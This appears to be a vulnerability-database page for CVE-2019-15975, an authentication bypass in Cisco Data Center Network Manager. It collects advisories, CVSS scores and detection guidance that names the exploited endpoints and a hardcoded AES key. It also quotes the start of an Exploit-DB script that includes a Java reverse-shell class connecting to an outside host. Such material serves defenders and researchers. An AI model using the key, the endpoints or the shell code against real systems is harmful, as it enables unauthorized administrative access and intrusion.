CVE-2019-15975
published 2020-01-06CVE-2019-15975: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass…
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
85.65%
99.7th percentile
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | cisco_data_center_network_manager | >= unspecified < n/a | n/a |
| cisco | data_center_network_manager | < 11.3\(1\) | 11.3\(1\) |
| cisco | data_center_network_manager | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated POST requests to /fm/fmrest/dbadmin/addUser with a crafted 'afw-token' header — this is the auth bypass endpoint used to add a global-admin account without prior authentication. ↗
- →The exploit forges an AES-CBC encrypted token using the hardcoded key 's91zEQmb305F!90a' with a zero IV and the prefix 'Source Incite'. Detecting this token pattern in the 'afw-token' HTTP header is a strong indicator of exploitation. ↗
- →Alert on POST requests to /LogonWSService/LogonWS SOAP endpoint immediately followed by requests to /fm/fmrest/dbadmin/addUser from the same source IP — this sequence indicates the two-stage auth bypass and admin account creation. ↗
- →Use Cisco Talos Snort SIDs 52530–52547 to detect exploitation attempts against CVE-2019-15975, CVE-2019-15976, and CVE-2019-15977 in Cisco DCNM. ↗
- ·The AES encryption uses a hardcoded key and a zero IV; the token also embeds the server's current time (leaked via the HTTP Date response header). The exploit loops to handle a race condition in InheritableThreadLocal.childValue, meaning multiple rapid requests to the auth bypass endpoint may be observed before a successful bypass. ↗
- ·There are no workarounds available for these vulnerabilities; only vendor-supplied software updates address CVE-2019-15975. ↗
- ·A public Proof of Concept and a Metasploit module exist for this vulnerability, significantly lowering the bar for exploitation. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_cisco9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
vendor_cisco·2020-01-02·CVSS 9.8
CVE-2019-15975 [CRITICAL] CWE-798 Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.
For more information about these vulnerabilities, see the Details section of this advisory.
Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
vendor_cisco·CVSS 3.0
CVE-2019-15975 Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
CVE-2019-15975: Cisco Data Center Network Manager Authentication Bypass Vulnerabilities
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. For more information about these vulnerabilities, see the
CVSS: 3.0
CWE: CWE-798, CWE-798
Bug IDs: CSCvq85945, CSCvq89859, CSCvq89898
GHSA
GHSA-m469-jmc4-66pp: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker
ghsa_unreviewed·2022-05-24
CVE-2019-15975 [HIGH] CWE-798 GHSA-m469-jmc4-66pp: Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
No detection rules found.
Exploit-DB
Cisco Data Center Network Manager 11.2 - Remote Code Execution
exploitdb·2020-02-06·CVSS 9.8
CVE-2019-15975 [CRITICAL] Cisco Data Center Network Manager 11.2 - Remote Code Execution
Cisco Data Center Network Manager 11.2 - Remote Code Execution
---
#!/usr/bin/python
"""
Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
Bug 1: CVE-2019-15975 / ZDI-20-003
Bug 2: CVE-2019-15979 / ZDI-20-100
Notes:
Si.java needs to be compiled against Java 8 (the target used 1.8u201):
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Si {
static{
try {
String host = "192.168.100.159";
int port = 1337;
String cmd =
Metasploit
Cisco DCNM auth bypass
metasploit
Cisco DCNM auth bypass
Cisco DCNM auth bypass
This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose. After that, you can login to the web interface with those credentials. The only necessary condition is the more or less recent connection of an admin as this exploit uses a kind of session stealing.
Checkpoint
20th January – Threat Intelligence Bulletin
blogs_checkpoint·2020-01-20
CVE-2020-0601 20th January – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 20th January – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 20th January 2020, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Hackers have stolen personal information in an attack on the Australian P&N bank. The attack focused on the bank’s CRM system that stored a great deal of sensitive personal and financial information. Australia has also experienced a data breach of a bushfire donation site – Hackers abused the outdated Magneto CMS u
Talos
Threat Source newsletter (Jan. 9, 2019)
blogs_talos·2020-01-09
Threat Source newsletter (Jan. 9, 2019)
## Threat Source newsletter (Jan. 9, 2019)
Newsletter compiled by Jon Munshaw.
Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.
We’re back after a long break for the holidays. And 2020 is already off to a fast start as tensions continue to rise in the Middle East.
We’ve gotten a lot of questions about whether customers and users should be concerned about cyber attacks from Iran after they’ve exchanged missile strikes with the U.S. But the reality of the situation is, if you haven’t already been preparing from attacks for state-sponsored actors, it’s already too late. We run down our thoughts on the situation here .
We also have our first Beers with Talos episode of the new year out, where the guys run down the
Talos
Threat Source newsletter (Jan. 9, 2019)
blogs_talos·2020-01-09
Threat Source newsletter (Jan. 9, 2019)
Newsletter compiled by Jon Munshaw.
Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.
We’re back after a long break for the holidays. And 2020 is already off to a fast start as tensions continue to rise in the Middle East.
We’ve gotten a lot of questions about whether customers and users should be concerned about cyber attacks from Iran after they’ve exchanged missile strikes with the U.S. But the reality of the situation is, if you haven’t already been preparing from attacks for state-sponsored actors, it’s already too late. We run down our thoughts on the situation here.
We also have our first Beers with Talos episode of the new year out, where the guys run down the top threats of 2019 and talk about what less
Tenable
CVE-2019-15975, CVE-2019-15976, CVE-2019-15977: Critical Authentication Bypass Vulnerabilities in Cisco Data Center Network Manager
blogs_tenable·2020-01-02·CVSS 9.8
[CRITICAL] CVE-2019-15975, CVE-2019-15976, CVE-2019-15977: Critical Authentication Bypass Vulnerabilities in Cisco Data Center Network Manager
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://packetstormsecurity.com/files/156238/Cisco-Data-Center-Network-Manager-11.2-Remote-Code-Execution.htmlhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypasshttp://packetstormsecurity.com/files/156238/Cisco-Data-Center-Network-Manager-11.2-Remote-Code-Execution.htmlhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass
2020-01-06
Published